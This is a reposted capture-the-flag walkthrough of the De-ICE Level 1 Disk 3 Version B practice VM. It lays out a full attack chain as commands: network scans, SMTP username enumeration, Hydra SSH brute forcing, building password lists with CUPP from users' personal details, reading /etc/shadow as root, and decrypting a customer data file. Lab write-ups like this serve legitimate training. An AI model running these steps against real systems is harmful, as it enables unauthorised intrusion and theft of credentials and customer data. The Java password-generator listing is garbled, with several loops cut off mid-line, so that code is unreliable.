HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to : g0tmi1k



This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.



The original post at here



Links



Watch video on-line

Download video



Brief Overview



The "vulnerable-by-design" series De-ICE, has released another challenge. However, it's in two different parts - which makes the naming more confusing! This is De-ICE level 1-disk 3, the second half, and it should not be confused with "version a" (de-ice-1.120-1.0a.iso aka Level 1-Disk 3-Release 1-Version A), as these are NOT the same challenge - it's a completely independent challenge. The students of "HackingDojo" produced their own exploitable LiveCD which was released under the de-ice name. This is it. To date all of Heorot.net releases (in date order) are as follows:



De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)

De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)

De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)

pWnOS (pWnOS v1.0.zip)

Hackerdemia (hackerdemia-1.1.0.iso)

De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)

De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)



Method



Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)

Scan network for the host (nmap)

Port scanned host (unicornscan)

Enumerated running services running open ports (nmap)

Enumerated possible username(s) (Netcat)

Brute forced login details (Hydra)

Profiled other users (CUPP)

Escalated privilege by re-creating custom encryption program (Java)

Found the "flag" (a database file)



What do I need?



de-ice-1.120-1.0b.iso (MD5: 5AFEA4D036681093408AE493D4BD2672)

Spare or a Virtual machine (Example: Virtual Box or VMware Player)

nmap – (Can be found on BackTrack 5).

unicornscan – (Can be found in BackTrack 5's repository).

hydra – (Can be found on BackTrack 5).

Common User Passwords Profiler – (Can be found on BackTrack 5).

Java compiler – (Can be found on BackTrack 5).



Walkthrough



By doing a quick "ping" scan with nmap, it reveals the live hosts on the network. Once the target has been discovered, a detailed port scan (TCP & UDP) was taken via unicornscan. The results were then checked with another detailed TCP port scan as well as enumerating which services are running by using nmap. Unicornscan is quicker doing a port scan (especially with UDP scanning). However, nmap has the upside of it being able to do more by "information gathering", for example "OS detection", "version detection of services", "a collection of script scanning" and "traceroute details" (by using "-a" option). The attacker also increases the scan speed (by "-T4"). Nmap also confirms TCP port 80 is open, which is being used for a web server (it's also the default port).



The attacker interacts with the web server and is presented with the "Company Portal" page. There is a message explaining that it the web site is "under maintenance", with methods of contact - a telephone number and email address.



The port scan revealed that there was a SMTP service running and decided to attempt to use the email address to identity possible usernames. The first method (VRFY) was disabled, so the attacker proceeds to draft an email. Depending on the recipient's name it will return if the account is valid or not. The attacker then tries different combinations of the given email address (CustomerServiceAdmin@nosecbank.com) until they find its valid login, csadmin.



The attacker then searches for a wordlist to aid them in attempting to brute force the password. (Editor's note: darkc0de.lst does contain the password. however it would of taken a lot longer for it to reach it). The attacker starts hydra attacking the SSH service and waits for it to try every entry in the file. After waiting a couple of minutes (due to the small size of the wordlist) the attacker found the valid password, 'rocker'.



Upon logging into the system remotely, the attacker finds if there are any other valid users in the system (the result is 4). The attacker then continues on by browsing the users (csadmin) personal folder. The attacker soon discovers a personal email conversation between the staff members. These emails contain personal information regarding each user - which is also commonly used as their password.



After building up the profile for each user, the attacker then generates possible passwords using this information, by using CUPP (Common User Passwords Profiler). The attacker enters in the collected information and waits for the possible combinations to be generated. They then repeat the brute force attempt, this time with a specific wordlist, tailor made for that user. This quickly found the user (sdadmin) password (his child's name and year of birth - donovin1998).



The attacker logs in with the new credentials and views his personal files and soon discovers a reply to the email, which contains more personal information regarding another staff member (as well as negative feeling towards them!). The whole process is then repeated again for the new user (dbadmin), who also used personal information for his password (nickname and a few numbers at the end-databaser60).



When the attacker logs in once again, they soon find the first part to an email which has been in every user account so far. Then contents of the email has been "corrupted", however, the header file of the message is still in contact. The subject of the message implies the purpose of it, "New Custom Encryption for Passwords". The attacker then extracts the printable characters, which shows the beginning of the possible source code.



The attacker then builds up the code, from the three found parts so far, which has been written in java and the function of it was the generation function for the new passwords policy. There are comments left in the code, saying it has already been used on two accounts (sysadmin and root). The attacker then fixes, cleans and adds the code (input & conversion functions).



Once the program was complete, the attacker runs it to generate the passwords for sysadmin and the root account. They then test the passwords by logging into the system as sysadmin and then switching to the super user account, root.



The attacker now has access to the complete system...



Game over



...and choose to explore. They find a message, left in the sysadmin home folder, explaining that the user account file has been updated, encrypted and moved. The attacker then locates this file, and by trying all the encryption algorithms with the super user's password, they were able to decrypt the file and view the content in plain text - revealing customers' details, such as names, email addresses, usernames, passwords and more!



Game over...again



Commands



ifconfig eth0

ifconfig eth0 192.168.1.192

ifconfig eth0

nmap 192.168.1.* -n -sn -sP

us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.1.20

firefox 192.168.1.20 # customerserviceadmin@nosecbank.com

nc -v 192.168.1.20 25

HELO attacker

VRFY customerserviceadmin

mail from: attacker@slax.example.net

rcpt to: customerserviceadmin

rcpt to: csadmin

quit

wc -l /pentest/passwords/wordlists/darkc0de.lst

find / -name password.lst

wc -l /opt/framework3/msf3/data/john/wordlists/password.lst

hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output

ssh csadmin@192.168.1.20 # rocker

id

cat /etc/passwd # sysadmin, dbadmin, sdadmin, csadmin

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)

exit

cd /pentest/passwords/cupp/

python cupp.py -i # Paul, Donovin, 22121998, nosecbank

hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh sdadmin@192.168.1.20 # donovin1998

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less # dbadmin (Fred, databaser)

exit

python cupp.py -i # Fred, databaser, nosecbank

hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh dbadmin@192.168.1.20 # databaser60

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less # sysadmin, New Custom Encryption for Passwords

umask 002

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' > /tmp/output

su csadmin # rocker

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output

su sdadmin # donovin1998

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- | sed 's/[ \t]*//' | sed -n '/^[0-9]*\t/p' >> /tmp/output

cat /tmp/output | sort -g

cat /tmp/output | sort -g | cut -f2-

exit

exit

exit

geany deice.java

less deice.java

javac deice.java

java deice # sysadmin - 531/{{tor/rv/A

java deice # root - 31/Fwxw+2

ssh sysadmin@192.168.1.20 # 7531/{{tor/rv/A

id

su - # 31/Fwxw+2

id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

pwd

exit

pwd

ls

cat Note_to_self

ls -lAhR /home

cd /home/ftp/incoming/

ls -l

openssl -h

openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"

su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"' # 31/Fwxw+2

ls -l

cat useracc_update.csv




deice.java



import java.io.*;

//import java.util.Arrays;



public class deice

{

public static void main(String[] args)

{

try

{

System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");



BufferedReader in=new BufferedReader(new InputStreamReader(System.in));

System.out.print("[?] Username: ");

String input=in.readLine();



int[] output=processLoop(input);

//System.out.println("[+] Output: "+Arrays.toString(output));



String outputASCII="";

for(int i=0;i System.out.println("[>] Password: "+outputASCII);



}

catch(IOException e)

{

System.out.println("[-] IO Error!");

}

}



/*input is username of account*/

public static int[] processLoop(String input){

int strL=input.length();

int lChar=(int)input.charAt(strL-1);

int fChar=(int)input.charAt(0);

int[] encArr=new int[strL+2];

encArr[0]=(int)lChar;



for(int i=1;i


encArr[encArr.length-1]=(int)fChar;

encArr=backLoop(encArr);

encArr=loopBack(encArr);

encArr=loopProcess(encArr);

int j=encArr.length-1;



for(int i=0;i
if(i==j) break;

int t=encArr[i];

encArr[i]=encArr[j];

encArr[j]=t;

j--;

}

return encArr;

}



/*Note the pseudocode will be implemented with the

root account and my account, we still need to implement it with the csadmin, sdadmin,

and dbadmin accounts though*/

public static int[] backLoop(int[] input){

int ref=input.length;

int a=input[1];

int b=input[ref-1];

int ch=(a+b)/2;



for(int i=0;i
if(i%2==0) input[i]=(input[i]%ch)+(ref+i);

else input[i]=(input[i]+ref+i);

}

return input;

}



public static int[] loopBack(int[] input){

int ref=input.length/2;

int[] encNew=new int[input.length+ref];

int ch=0;



for(int i=(ref/2);i
encNew[i]=input[ch];

ch++;

}



for(int i=0;i
if(encNew[i]<=33) encNew[i]=33+(++ref*2);
else if(encNew[i]>=126) encNew[i]=126-(--ref*2);

else{

if(i%2==0) encNew[i]-=(i%3);

else encNew[i]+=(i%2);

}

}

return encNew;

}



public static int[] loopProcess(int[] input){

for(int i=0;i
if(input[i]==40||input[i]==41) input[i]+=input.length;

else if(input[i]==45) input[i]+=20+i;

}

return input;

}

}




Notes



- De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!

- The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.

- I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!



That's all! See you.